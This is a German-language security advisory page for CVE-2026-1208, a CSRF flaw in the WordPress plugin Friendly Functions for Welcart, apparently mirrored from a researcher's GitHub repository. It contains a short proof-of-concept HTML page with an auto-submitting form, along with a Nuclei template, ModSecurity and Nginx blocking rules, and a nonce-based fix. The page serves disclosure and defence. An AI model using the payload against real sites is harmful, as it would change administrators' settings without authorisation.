Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-1208 — Friendly Functions for Welcart <= 1.2.5 - Cross-Site Request Forgery zur Aktualisierung von Einstellungen | Kitploit
Tools/GitHubGitHub/snailsploit/cve-2026-1208
SchwachstellenanalyseExploitationWebsicherheitPenetrationstestsPapers & ForschungLernen & Bildung
GitHubsnailsploit/cve-2026-1208

CVE-2026-1208

Friendly Functions for Welcart <= 1.2.5 - Cross-Site Request Forgery zur Aktualisierung von Einstellungen

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-1208: Cross-Site Request Forgery im Plugin Friendly Functions for Welcart

CVE CVSS Score WordPress Plugin CWE-352 Wordfence

Schlüsselwörter: CVE-2026-1208, Schwachstelle in Friendly Functions for Welcart, CSRF, Cross-Site Request Forgery, WordPress-Sicherheit, WordPress-Plugin-Schwachstelle, CWE-352, Welcart-Sicherheit, Einstellungsmanipulation, WordPress CVE 2026

Inhaltsverzeichnis

  • Überblick
  • Details zur Schwachstelle
  • Technische Analyse
  • Angriffsvektor
  • Proof of Concept
  • Behebungsanleitung
  • CVSS-Metriken
  • Referenzen
  • Sicherheitskontakt

Überblick

CSRF-Schwachstelle im WordPress-Plugin Friendly Functions for Welcart (CVE-2026-1208) – Sicherheitsfehler, der es nicht authentifizierten Angreifern ermöglicht, Plugin-Einstellungen über gefälschte Anfragen zu ändern.

Im Plugin Friendly Functions for Welcart wurde eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) entdeckt, die es nicht authentifizierten Angreifern ermöglicht, Plugin-Einstellungen zu ändern, indem sie einen Administrator dazu verleiten, auf einen bösartigen Link zu klicken.

Entdeckt von: Kai Aizen (SnailSploit)
Veröffentlicht: 23. Januar 2026
CVSS-Score: 4.3 (Mittel)
CWE: CWE-352 – Cross-Site Request Forgery (CSRF)
Plugin: Friendly Functions for Welcart
Angriffstyp: Cross-Site Request Forgery zur Änderung von Einstellungen
Erforderliche Berechtigungen: Keine (nicht authentifizierter Angriff + Social Engineering)

Details zur Schwachstelle

Beschreibung

Das Plugin Friendly Functions for Welcart für WordPress ist in allen Versionen bis einschließlich 1.2.5 anfällig für Cross-Site Request Forgery. Ursache ist eine fehlende oder fehlerhafte Nonce-Validierung auf der Einstellungsseite. Dadurch ist es nicht authentifizierten Angreifern möglich, die Plugin-Einstellungen über eine gefälschte Anfrage zu ändern, sofern sie einen Website-Administrator dazu verleiten können, eine Aktion wie das Klicken auf einen Link auszuführen.

Auswirkungen

Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern:

  • Plugin-Einstellungen ohne Autorisierung zu ändern
  • Die Welcart-E-Commerce-Funktionalität zu manipulieren
  • Möglicherweise den Ladenbetrieb zu stören
  • Mit anderen Schwachstellen für eskalierte Angriffe zu kombinieren

Betroffene Versionen

  • Verwundbar: Alle Versionen ≤ 1.2.5
  • Behoben: Version 1.2.6 und höher

CVSS-v3.1-Metriken

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Technische Details

Die Schwachstelle liegt in der Implementierung der Einstellungsseite, wo:

  1. Das Einstellungsformular des Plugins keine ordnungsgemäße Nonce-Validierung aufweist
  2. Anfragen zur Einstellungsaktualisierung ohne Überprüfung der Herkunft der Anfrage verarbeitet werden
  3. Keine CSRF-Tokens generiert oder validiert werden
  4. Administrative Aktionen über Cross-Origin-Anfragen ausgeführt werden können

Verwundbare Codestellen

Die Schwachstelle wurde an den folgenden Stellen identifiziert:

  • ffw_function_settings.php - Zeile 53
  • ffw_function_settings.php - Zeile 58

Angriffsvektor

Der Angriff erfordert Social Engineering, um einen authentifizierten Administrator dazu zu bringen, eine bösartige Seite zu besuchen oder einen manipulierten Link zu klicken, während er in seiner WordPress-Website angemeldet ist.

root@kitploit:~
Target: WordPress Admin with Friendly Functions for Welcart installed
Method: Malicious HTML page with auto-submitting form
Trigger: Administrator clicks link or visits attacker-controlled page

Proof of Concept

CSRF-HTML-Payload

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2026-1208 - CSRF PoC</title>
</head>
<body>
    <h1>Loading...</h1>
    <form id="csrf-form" action="https://TARGET_SITE/wp-admin/admin.php?page=ffw-settings" method="POST">
        <input type="hidden" name="ffw_setting_option" value="malicious_value" />
        <!-- Add additional setting fields as needed -->
    </form>
    <script>
        document.getElementById('csrf-form').submit();
    </script>
</body>
</html>

⚠️ Warnung: Dieser PoC wird nur für Bildungs- und autorisierte Testzwecke bereitgestellt.

Testschritte

  1. Richten Sie eine WordPress-Instanz mit Friendly Functions for Welcart <= 1.2.5 ein
  2. Hosten Sie die CSRF-Payload auf einem vom Angreifer kontrollierten Server
  3. Melden Sie sich als Administrator auf der Ziel-WordPress-Website an
  4. Besuchen Sie die vom Angreifer kontrollierte Seite (simuliert das Klicken auf einen bösartigen Link)
  5. Beobachten Sie, dass die Plugin-Einstellungen ohne ausdrückliche Zustimmung geändert werden

Erkennung

WordPress-Plugin-Prüfung

root@kitploit:~
# Check if vulnerable version is installed
wp plugin list | grep -i "friendly-functions-for-welcart"

# Get specific version
wp plugin get friendly-functions-for-welcart --field=version

Regeln für Sicherheitsscanner

Nuclei-Vorlage:

root@kitploit:~
id: CVE-2026-1208

info:
  name: Friendly Functions for Welcart - CSRF to Settings Update
  author: SnailSploit
  severity: medium
  description: |
    Friendly Functions for Welcart plugin for WordPress is vulnerable 
    to CSRF in versions <= 1.2.5 due to missing nonce validation.
  reference:
    - https://github.com/SnailSploit/CVE-2026-1208
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/friendly-functions-for-welcart/friendly-functions-for-welcart-125-cross-site-request-forgery-to-settings-update
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2026-1208
    cwe-id: CWE-352
  tags: cve,cve2026,wordpress,wp-plugin,csrf,welcart

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/friendly-functions-for-welcart/readme.txt"
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Friendly Functions for Welcart"
      
      - type: regex
        regex:
          - "(?i)Stable tag:\\s*(1\\.([0-1]\\.[0-9]|2\\.[0-5]))"
      
      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "(?i)Stable tag:\\s*([0-9.]+)"

Web-Application-Firewall-Regeln

ModSecurity-Regel:

root@kitploit:~
# CVE-2026-1208 - Block CSRF attempts to FFW settings
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
    "chain,id:2026001,phase:2,t:none,t:urlDecodeUni,\
    log,deny,status:403,msg:'CVE-2026-1208 CSRF Attempt Blocked'"
    SecRule ARGS:page "@streq ffw-settings" \
        "chain"
        SecRule &REQUEST_HEADERS:Referer "@eq 0"

# Alternative: Block if referer doesn't match site domain
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
    "chain,id:2026002,phase:2,t:none,\
    log,deny,status:403,msg:'CVE-2026-1208 Cross-Origin Request Blocked'"
    SecRule ARGS:page "@streq ffw-settings" \
        "chain"
        SecRule REQUEST_HEADERS:Referer "!@contains yourdomain.com"

Nginx-Regel:

root@kitploit:~
# CVE-2026-1208 - CSRF Protection for FFW Settings
location /wp-admin/admin.php {
    # Check for ffw-settings page without proper referer
    if ($arg_page = "ffw-settings") {
        set $csrf_check "1";
    }
    if ($http_referer !~ "^https?://(www\.)?yourdomain\.com") {
        set $csrf_check "${csrf_check}1";
    }
    if ($csrf_check = "11") {
        return 403;
    }
    
    # Pass to PHP handler
    try_files $uri =404;
    fastcgi_pass php-fpm;
    include fastcgi_params;
}

Behebung

Für Website-Administratoren

Sofortiges Handeln erforderlich:

  1. Aktualisieren Sie Friendly Functions for Welcart sofort auf Version 1.2.6 oder höher
  2. Überprüfen Sie die Plugin-Einstellungen Ihrer Website auf unbefugte Änderungen
  3. Wenn Sie nicht sofort aktualisieren können, erwägen Sie, das Plugin vorübergehend zu deaktivieren

Aktualisierungsanweisungen

  1. Navigieren Sie im WordPress-Adminbereich zu Plugins > Installierte Plugins
  2. Suchen Sie das Plugin "Friendly Functions for Welcart"
  3. Klicken Sie auf Jetzt aktualisieren, um auf Version 1.2.6 oder höher zu aktualisieren
  4. Vergewissern Sie sich, dass das Update erfolgreich war
  5. Überprüfen und bestätigen Sie, dass Ihre Plugin-Einstellungen korrekt sind

Für Entwickler

Stellen Sie sicher, dass alle Einstellungsformulare einen ordnungsgemäßen CSRF-Schutz implementieren:

root@kitploit:~
// Example of proper CSRF protection in WordPress
// In your form:
wp_nonce_field('ffw_settings_update', 'ffw_settings_nonce');

// In your form handler:
function process_settings_update() {
    // Verify nonce
    if (!isset($_POST['ffw_settings_nonce']) || 
        !wp_verify_nonce($_POST['ffw_settings_nonce'], 'ffw_settings_update')) {
        wp_die('Security check failed');
    }
    
    // Check capabilities
    if (!current_user_can('manage_options')) {
        wp_die('Unauthorized');
    }
    
    // Process settings update
    // ...
}

Chronologie

  • 23. Januar 2026 - Schwachstelle öffentlich offengelegt
  • 23. Januar 2026 - CVE-2026-1208 zugewiesen
  • Version 1.2.6 - Patch vom Plugin-Anbieter veröffentlicht

Referenzen

  • Wordfence Intelligence Datenbankeintrag
  • WordPress Plugin Trac - Zeile 53
  • WordPress Plugin Trac - Zeile 58
  • Plugin-Changeset (Patch)
  • MITRE-CVE-Eintrag

Credits

Forscher:

  • Kai Aizen - SnailSploit

Offenlegungsprozess: Koordiniert über das Wordfence Bug Bounty Program

Haftungsausschluss

Diese Informationen werden ausschließlich zu Zwecken der Sicherheitsforschung und Verteidigung bereitgestellt. Jegliche Ausnutzung dieser Schwachstelle für böswillige Zwecke ist illegal und unethisch. Holen Sie immer eine ordnungsgemäße Genehmigung ein, bevor Sie Systeme testen, die Ihnen nicht gehören.

Kontakt

Bei Fragen oder für weitere Informationen zu dieser Schwachstelle:

  • E-Mail: [email protected]
  • Webseite: snailsploit.com
  • Organisation: SnailSploit Security Research

Zuletzt aktualisiert: 23. Januar 2026


📚 Dokumentation & Autor

Die vollständige Dokumentation, Methodik und verwandte Forschung zu diesem Projekt finden Sie unter:

https://snailsploit.com/security-research/cves/cve-2026-1208/

Erstellt von Kai Aizen — unabhängiger Offensiv-Sicherheitsforscher.

snailsploit.com · Research · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

Gleicher Angriff. Anderes Substrat.

Tool herunterladen
MetrikWert
AngriffsvektorNetzwerk (AV:N)
AngriffskomplexitätNiedrig (AC:L)
Erforderliche BerechtigungenKeine (PR:N)
BenutzerinteraktionErforderlich (UI:R)
AuswirkungsbereichUnverändert (S:U)
VertraulichkeitKeine (C:N)
IntegritätNiedrig (I:L)
VerfügbarkeitKeine (A:N)